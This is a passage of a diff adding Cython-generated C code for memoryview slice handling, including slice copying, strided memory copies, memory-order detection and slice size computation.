__Pyx_RefNannySetupContext("get_slice_from_memview", 0); + + /* "View.MemoryView":1055 + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * obj = memview + * return &obj.from_slice + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":1056 + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): + * obj = memview # <<<<<<<<<<<<<< + * return &obj.from_slice + * else: + */ + if (!(likely(((((PyObject *)__pyx_v_memview)) == Py_None) || likely(__Pyx_TypeTest(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type))))) __PYX_ERR(1, 1056, __pyx_L1_error) + __pyx_t_2 = ((PyObject *)__pyx_v_memview); + __Pyx_INCREF(__pyx_t_2); + __pyx_v_obj = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1057 + * if isinstance(memview, _memoryviewslice): + * obj = memview + * return &obj.from_slice # <<<<<<<<<<<<<< + * else: + * slice_copy(memview, mslice) + */ + __pyx_r = (&__pyx_v_obj->from_slice); + goto __pyx_L0; + + /* "View.MemoryView":1055 + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * obj = memview + * return &obj.from_slice + */ + } + + /* "View.MemoryView":1059 + * return &obj.from_slice + * else: + * slice_copy(memview, mslice) # <<<<<<<<<<<<<< + * return mslice + * + */ + /*else*/ { + __pyx_memoryview_slice_copy(__pyx_v_memview, __pyx_v_mslice); + + /* "View.MemoryView":1060 + * else: + * slice_copy(memview, mslice) + * return mslice # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_slice_copy') + */ + __pyx_r = __pyx_v_mslice; + goto __pyx_L0; + } + + /* "View.MemoryView":1052 + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + * cdef __Pyx_memviewslice *get_slice_from_memview(memoryview memview, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.get_slice_from_memview", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_obj); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1063 + * + * @cname('__pyx_memoryview_slice_copy') + * cdef void slice_copy(memoryview memview, __Pyx_memviewslice *dst) noexcept: # <<<<<<<<<<<<<< + * cdef int dim + * cdef (Py_ssize_t*) shape, strides, suboffsets + */ + +static void __pyx_memoryview_slice_copy(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_dst) { + int __pyx_v_dim; + Py_ssize_t *__pyx_v_shape; + Py_ssize_t *__pyx_v_strides; + Py_ssize_t *__pyx_v_suboffsets; + __Pyx_RefNannyDeclarations + Py_ssize_t *__pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + Py_ssize_t __pyx_t_5; + __Pyx_RefNannySetupContext("slice_copy", 0); + + /* "View.MemoryView":1067 + * cdef (Py_ssize_t*) shape, strides, suboffsets + * + * shape = memview.view.shape # <<<<<<<<<<<<<< + * strides = memview.view.strides + * suboffsets = memview.view.suboffsets + */ + __pyx_t_1 = __pyx_v_memview->view.shape; + __pyx_v_shape = __pyx_t_1; + + /* "View.MemoryView":1068 + * + * shape = memview.view.shape + * strides = memview.view.strides # <<<<<<<<<<<<<< + * suboffsets = memview.view.suboffsets + * + */ + __pyx_t_1 = __pyx_v_memview->view.strides; + __pyx_v_strides = __pyx_t_1; + + /* "View.MemoryView":1069 + * shape = memview.view.shape + * strides = memview.view.strides + * suboffsets = memview.view.suboffsets # <<<<<<<<<<<<<< + * + * dst.memview = <__pyx_memoryview *> memview + */ + __pyx_t_1 = __pyx_v_memview->view.suboffsets; + __pyx_v_suboffsets = __pyx_t_1; + + /* "View.MemoryView":1071 + * suboffsets = memview.view.suboffsets + * + * dst.memview = <__pyx_memoryview *> memview # <<<<<<<<<<<<<< + * dst.data = memview.view.buf + * + */ + __pyx_v_dst->memview = ((struct __pyx_memoryview_obj *)__pyx_v_memview); + + /* "View.MemoryView":1072 + * + * dst.memview = <__pyx_memoryview *> memview + * dst.data = memview.view.buf # <<<<<<<<<<<<<< + * + * for dim in range(memview.view.ndim): + */ + __pyx_v_dst->data = ((char *)__pyx_v_memview->view.buf); + + /* "View.MemoryView":1074 + * dst.data = memview.view.buf + * + * for dim in range(memview.view.ndim): # <<<<<<<<<<<<<< + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] + */ + __pyx_t_2 = __pyx_v_memview->view.ndim; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_dim = __pyx_t_4; + + /* "View.MemoryView":1075 + * + * for dim in range(memview.view.ndim): + * dst.shape[dim] = shape[dim] # <<<<<<<<<<<<<< + * dst.strides[dim] = strides[dim] + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 + */ + (__pyx_v_dst->shape[__pyx_v_dim]) = (__pyx_v_shape[__pyx_v_dim]); + + /* "View.MemoryView":1076 + * for dim in range(memview.view.ndim): + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] # <<<<<<<<<<<<<< + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 + * + */ + (__pyx_v_dst->strides[__pyx_v_dim]) = (__pyx_v_strides[__pyx_v_dim]); + + /* "View.MemoryView":1077 + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_object') + */ + if ((__pyx_v_suboffsets != 0)) { + __pyx_t_5 = (__pyx_v_suboffsets[__pyx_v_dim]); + } else { + __pyx_t_5 = -1L; + } + (__pyx_v_dst->suboffsets[__pyx_v_dim]) = __pyx_t_5; + } + + /* "View.MemoryView":1063 + * + * @cname('__pyx_memoryview_slice_copy') + * cdef void slice_copy(memoryview memview, __Pyx_memviewslice *dst) noexcept: # <<<<<<<<<<<<<< + * cdef int dim + * cdef (Py_ssize_t*) shape, strides, suboffsets + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":1080 + * + * @cname('__pyx_memoryview_copy_object') + * cdef memoryview_copy(memoryview memview): # <<<<<<<<<<<<<< + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + */ + +static PyObject *__pyx_memoryview_copy_object(struct __pyx_memoryview_obj *__pyx_v_memview) { + __Pyx_memviewslice __pyx_v_memviewslice; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_copy", 0); + + /* "View.MemoryView":1083 + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + * slice_copy(memview, &memviewslice) # <<<<<<<<<<<<<< + * return memoryview_copy_from_slice(memview, &memviewslice) + * + */ + __pyx_memoryview_slice_copy(__pyx_v_memview, (&__pyx_v_memviewslice)); + + /* "View.MemoryView":1084 + * cdef __Pyx_memviewslice memviewslice + * slice_copy(memview, &memviewslice) + * return memoryview_copy_from_slice(memview, &memviewslice) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_object_from_slice') + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_memoryview_copy_object_from_slice(__pyx_v_memview, (&__pyx_v_memviewslice)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1084, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":1080 + * + * @cname('__pyx_memoryview_copy_object') + * cdef memoryview_copy(memoryview memview): # <<<<<<<<<<<<<< + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview_copy", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1087 + * + * @cname('__pyx_memoryview_copy_object_from_slice') + * cdef memoryview_copy_from_slice(memoryview memview, __Pyx_memviewslice *memviewslice): # <<<<<<<<<<<<<< + * """ + * Create a new memoryview object from a given memoryview object and slice. + */ + +static PyObject *__pyx_memoryview_copy_object_from_slice(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_memviewslice) { + PyObject *(*__pyx_v_to_object_func)(char *); + int (*__pyx_v_to_dtype_func)(char *, PyObject *); + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *(*__pyx_t_2)(char *); + int (*__pyx_t_3)(char *, PyObject *); + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_copy_from_slice", 0); + + /* "View.MemoryView":1094 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":1095 + * + * if isinstance(memview, _memoryviewslice): + * to_object_func = (<_memoryviewslice> memview).to_object_func # <<<<<<<<<<<<<< + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + * else: + */ + __pyx_t_2 = ((struct __pyx_memoryviewslice_obj *)__pyx_v_memview)->to_object_func; + __pyx_v_to_object_func = __pyx_t_2; + + /* "View.MemoryView":1096 + * if isinstance(memview, _memoryviewslice): + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func # <<<<<<<<<<<<<< + * else: + * to_object_func = NULL + */ + __pyx_t_3 = ((struct __pyx_memoryviewslice_obj *)__pyx_v_memview)->to_dtype_func; + __pyx_v_to_dtype_func = __pyx_t_3; + + /* "View.MemoryView":1094 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1098 + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + * else: + * to_object_func = NULL # <<<<<<<<<<<<<< + * to_dtype_func = NULL + * + */ + /*else*/ { + __pyx_v_to_object_func = NULL; + + /* "View.MemoryView":1099 + * else: + * to_object_func = NULL + * to_dtype_func = NULL # <<<<<<<<<<<<<< + * + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, + */ + __pyx_v_to_dtype_func = NULL; + } + __pyx_L3:; + + /* "View.MemoryView":1101 + * to_dtype_func = NULL + * + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, # <<<<<<<<<<<<<< + * to_object_func, to_dtype_func, + * memview.dtype_is_object) + */ + __Pyx_XDECREF(__pyx_r); + + /* "View.MemoryView":1103 + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, + * to_object_func, to_dtype_func, + * memview.dtype_is_object) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __pyx_memoryview_fromslice((__pyx_v_memviewslice[0]), __pyx_v_memview->view.ndim, __pyx_v_to_object_func, __pyx_v_to_dtype_func, __pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1101, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "View.MemoryView":1087 + * + * @cname('__pyx_memoryview_copy_object_from_slice') + * cdef memoryview_copy_from_slice(memoryview memview, __Pyx_memviewslice *memviewslice): # <<<<<<<<<<<<<< + * """ + * Create a new memoryview object from a given memoryview object and slice. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.memoryview_copy_from_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1109 + * + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: # <<<<<<<<<<<<<< + * return -arg if arg < 0 else arg + * + */ + +static Py_ssize_t abs_py_ssize_t(Py_ssize_t __pyx_v_arg) { + Py_ssize_t __pyx_r; + Py_ssize_t __pyx_t_1; + + /* "View.MemoryView":1110 + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: + * return -arg if arg < 0 else arg # <<<<<<<<<<<<<< + * + * @cname('__pyx_get_best_slice_order') + */ + if ((__pyx_v_arg < 0)) { + __pyx_t_1 = (-__pyx_v_arg); + } else { + __pyx_t_1 = __pyx_v_arg; + } + __pyx_r = __pyx_t_1; + goto __pyx_L0; + + /* "View.MemoryView":1109 + * + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: # <<<<<<<<<<<<<< + * return -arg if arg < 0 else arg + * + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1113 + * + * @cname('__pyx_get_best_slice_order') + * cdef char get_best_order(__Pyx_memviewslice *mslice, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * """ + * Figure out the best memory access order for a given slice. + */ + +static char __pyx_get_best_slice_order(__Pyx_memviewslice *__pyx_v_mslice, int __pyx_v_ndim) { + int __pyx_v_i; + Py_ssize_t __pyx_v_c_stride; + Py_ssize_t __pyx_v_f_stride; + char __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + + /* "View.MemoryView":1118 + * """ + * cdef int i + * cdef Py_ssize_t c_stride = 0 # <<<<<<<<<<<<<< + * cdef Py_ssize_t f_stride = 0 + * + */ + __pyx_v_c_stride = 0; + + /* "View.MemoryView":1119 + * cdef int i + * cdef Py_ssize_t c_stride = 0 + * cdef Py_ssize_t f_stride = 0 # <<<<<<<<<<<<<< + * + * for i in range(ndim - 1, -1, -1): + */ + __pyx_v_f_stride = 0; + + /* "View.MemoryView":1121 + * cdef Py_ssize_t f_stride = 0 + * + * for i in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] + */ + for (__pyx_t_1 = (__pyx_v_ndim - 1); __pyx_t_1 > -1; __pyx_t_1-=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":1122 + * + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * c_stride = mslice.strides[i] + * break + */ + __pyx_t_2 = ((__pyx_v_mslice->shape[__pyx_v_i]) > 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1123 + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_c_stride = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1124 + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] + * break # <<<<<<<<<<<<<< + * + * for i in range(ndim): + */ + goto __pyx_L4_break; + + /* "View.MemoryView":1122 + * + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * c_stride = mslice.strides[i] + * break + */ + } + } + __pyx_L4_break:; + + /* "View.MemoryView":1126 + * break + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] + */ + __pyx_t_1 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_1; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1127 + * + * for i in range(ndim): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * f_stride = mslice.strides[i] + * break + */ + __pyx_t_2 = ((__pyx_v_mslice->shape[__pyx_v_i]) > 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1128 + * for i in range(ndim): + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_f_stride = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1129 + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] + * break # <<<<<<<<<<<<<< + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): + */ + goto __pyx_L7_break; + + /* "View.MemoryView":1127 + * + * for i in range(ndim): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * f_stride = mslice.strides[i] + * break + */ + } + } + __pyx_L7_break:; + + /* "View.MemoryView":1131 + * break + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): # <<<<<<<<<<<<<< + * return 'C' + * else: + */ + __pyx_t_2 = (abs_py_ssize_t(__pyx_v_c_stride) <= abs_py_ssize_t(__pyx_v_f_stride)); + if (__pyx_t_2) { + + /* "View.MemoryView":1132 + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): + * return 'C' # <<<<<<<<<<<<<< + * else: + * return 'F' + */ + __pyx_r = 'C'; + goto __pyx_L0; + + /* "View.MemoryView":1131 + * break + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): # <<<<<<<<<<<<<< + * return 'C' + * else: + */ + } + + /* "View.MemoryView":1134 + * return 'C' + * else: + * return 'F' # <<<<<<<<<<<<<< + * + * @cython.cdivision(True) + */ + /*else*/ { + __pyx_r = 'F'; + goto __pyx_L0; + } + + /* "View.MemoryView":1113 + * + * @cname('__pyx_get_best_slice_order') + * cdef char get_best_order(__Pyx_memviewslice *mslice, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * """ + * Figure out the best memory access order for a given slice. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1137 + * + * @cython.cdivision(True) + * cdef void _copy_strided_to_strided(char *src_data, Py_ssize_t *src_strides, # <<<<<<<<<<<<<< + * char *dst_data, Py_ssize_t *dst_strides, + * Py_ssize_t *src_shape, Py_ssize_t *dst_shape, + */ + +static void _copy_strided_to_strided(char *__pyx_v_src_data, Py_ssize_t *__pyx_v_src_strides, char *__pyx_v_dst_data, Py_ssize_t *__pyx_v_dst_strides, Py_ssize_t *__pyx_v_src_shape, Py_ssize_t *__pyx_v_dst_shape, int __pyx_v_ndim, size_t __pyx_v_itemsize) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + CYTHON_UNUSED Py_ssize_t __pyx_v_src_extent; + Py_ssize_t __pyx_v_dst_extent; + Py_ssize_t __pyx_v_src_stride; + Py_ssize_t __pyx_v_dst_stride; + int __pyx_t_1; + int __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + Py_ssize_t __pyx_t_5; + + /* "View.MemoryView":1144 + * + * cdef Py_ssize_t i + * cdef Py_ssize_t src_extent = src_shape[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] + */ + __pyx_v_src_extent = (__pyx_v_src_shape[0]); + + /* "View.MemoryView":1145 + * cdef Py_ssize_t i + * cdef Py_ssize_t src_extent = src_shape[0] + * cdef Py_ssize_t dst_extent = dst_shape[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t src_stride = src_strides[0] + * cdef Py_ssize_t dst_stride = dst_strides[0] + */ + __pyx_v_dst_extent = (__pyx_v_dst_shape[0]); + + /* "View.MemoryView":1146 + * cdef Py_ssize_t src_extent = src_shape[0] + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + */ + __pyx_v_src_stride = (__pyx_v_src_strides[0]); + + /* "View.MemoryView":1147 + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] + * cdef Py_ssize_t dst_stride = dst_strides[0] # <<<<<<<<<<<<<< + * + * if ndim == 1: + */ + __pyx_v_dst_stride = (__pyx_v_dst_strides[0]); + + /* "View.MemoryView":1149 + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + */ + __pyx_t_1 = (__pyx_v_ndim == 1); + if (__pyx_t_1) { + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + __pyx_t_2 = (__pyx_v_src_stride > 0); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_dst_stride > 0); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L5_bool_binop_done; + } + + /* "View.MemoryView":1151 + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): # <<<<<<<<<<<<<< + * memcpy(dst_data, src_data, itemsize * dst_extent) + * else: + */ + __pyx_t_2 = (((size_t)__pyx_v_src_stride) == __pyx_v_itemsize); + if (__pyx_t_2) { + __pyx_t_2 = (__pyx_v_itemsize == ((size_t)__pyx_v_dst_stride)); + } + __pyx_t_1 = __pyx_t_2; + __pyx_L5_bool_binop_done:; + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + if (__pyx_t_1) { + + /* "View.MemoryView":1152 + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) # <<<<<<<<<<<<<< + * else: + * for i in range(dst_extent): + */ + (void)(memcpy(__pyx_v_dst_data, __pyx_v_src_data, (__pyx_v_itemsize * __pyx_v_dst_extent))); + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + goto __pyx_L4; + } + + /* "View.MemoryView":1154 + * memcpy(dst_data, src_data, itemsize * dst_extent) + * else: + * for i in range(dst_extent): # <<<<<<<<<<<<<< + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride + */ + /*else*/ { + __pyx_t_3 = __pyx_v_dst_extent; + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_4; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "View.MemoryView":1155 + * else: + * for i in range(dst_extent): + * memcpy(dst_data, src_data, itemsize) # <<<<<<<<<<<<<< + * src_data += src_stride + * dst_data += dst_stride + */ + (void)(memcpy(__pyx_v_dst_data, __pyx_v_src_data, __pyx_v_itemsize)); + + /* "View.MemoryView":1156 + * for i in range(dst_extent): + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride # <<<<<<<<<<<<<< + * dst_data += dst_stride + * else: + */ + __pyx_v_src_data = (__pyx_v_src_data + __pyx_v_src_stride); + + /* "View.MemoryView":1157 + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride + * dst_data += dst_stride # <<<<<<<<<<<<<< + * else: + * for i in range(dst_extent): + */ + __pyx_v_dst_data = (__pyx_v_dst_data + __pyx_v_dst_stride); + } + } + __pyx_L4:; + + /* "View.MemoryView":1149 + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1159 + * dst_data += dst_stride + * else: + * for i in range(dst_extent): # <<<<<<<<<<<<<< + * _copy_strided_to_strided(src_data, src_strides + 1, + * dst_data, dst_strides + 1, + */ + /*else*/ { + __pyx_t_3 = __pyx_v_dst_extent; + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_4; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "View.MemoryView":1160 + * else: + * for i in range(dst_extent): + * _copy_strided_to_strided(src_data, src_strides + 1, # <<<<<<<<<<<<<< + * dst_data, dst_strides + 1, + * src_shape + 1, dst_shape + 1, + */ + _copy_strided_to_strided(__pyx_v_src_data, (__pyx_v_src_strides + 1), __pyx_v_dst_data, (__pyx_v_dst_strides + 1), (__pyx_v_src_shape + 1), (__pyx_v_dst_shape + 1), (__pyx_v_ndim - 1), __pyx_v_itemsize); + + /* "View.MemoryView":1164 + * src_shape + 1, dst_shape + 1, + * ndim - 1, itemsize) + * src_data += src_stride # <<<<<<<<<<<<<< + * dst_data += dst_stride + * + */ + __pyx_v_src_data = (__pyx_v_src_data + __pyx_v_src_stride); + + /* "View.MemoryView":1165 + * ndim - 1, itemsize) + * src_data += src_stride + * dst_data += dst_stride # <<<<<<<<<<<<<< + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, + */ + __pyx_v_dst_data = (__pyx_v_dst_data + __pyx_v_dst_stride); + } + } + __pyx_L3:; + + /* "View.MemoryView":1137 + * + * @cython.cdivision(True) + * cdef void _copy_strided_to_strided(char *src_data, Py_ssize_t *src_strides, # <<<<<<<<<<<<<< + * char *dst_data, Py_ssize_t *dst_strides, + * Py_ssize_t *src_shape, Py_ssize_t *dst_shape, + */ + + /* function exit code */ +} + +/* "View.MemoryView":1167 + * dst_data += dst_stride + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + */ + +static void copy_strided_to_strided(__Pyx_memviewslice *__pyx_v_src, __Pyx_memviewslice *__pyx_v_dst, int __pyx_v_ndim, size_t __pyx_v_itemsize) { + + /* "View.MemoryView":1170 + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + * _copy_strided_to_strided(src.data, src.strides, dst.data, dst.strides, # <<<<<<<<<<<<<< + * src.shape, dst.shape, ndim, itemsize) + * + */ + _copy_strided_to_strided(__pyx_v_src->data, __pyx_v_src->strides, __pyx_v_dst->data, __pyx_v_dst->strides, __pyx_v_src->shape, __pyx_v_dst->shape, __pyx_v_ndim, __pyx_v_itemsize); + + /* "View.MemoryView":1167 + * dst_data += dst_stride + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1174 + * + * @cname('__pyx_memoryview_slice_get_size') + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + */ + +static Py_ssize_t __pyx_memoryview_slice_get_size(__Pyx_memviewslice *__pyx_v_src, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_shape; + Py_ssize_t __pyx_v_size; + Py_ssize_t __pyx_r; + Py_ssize_t __pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + + /* "View.MemoryView":1176 + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize # <<<<<<<<<<<<<< + * + * for shape in src.shape[:ndim]: + */ + __pyx_t_1 = __pyx_v_src->memview->view.itemsize; + __pyx_v_size = __pyx_t_1; + + /* "View.MemoryView":1178 + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + * + * for shape in src.shape[:ndim]: # <<<<<<<<<<<<<< + * size *= shape + * + */ + __pyx_t_3 = (__pyx_v_src->shape + __pyx_v_ndim); + for (__pyx_t_4 = __pyx_v_src->shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_v_shape = (__pyx_t_2[0]); + + /* "View.MemoryView":1179 + * + * for shape in src.shape[:ndim]: + * size *= shape # <<<<<<<<<<<<<< + * + * return size + */ + __pyx_v_size = (__pyx_v_size * __pyx_v_shape); + } + + /* 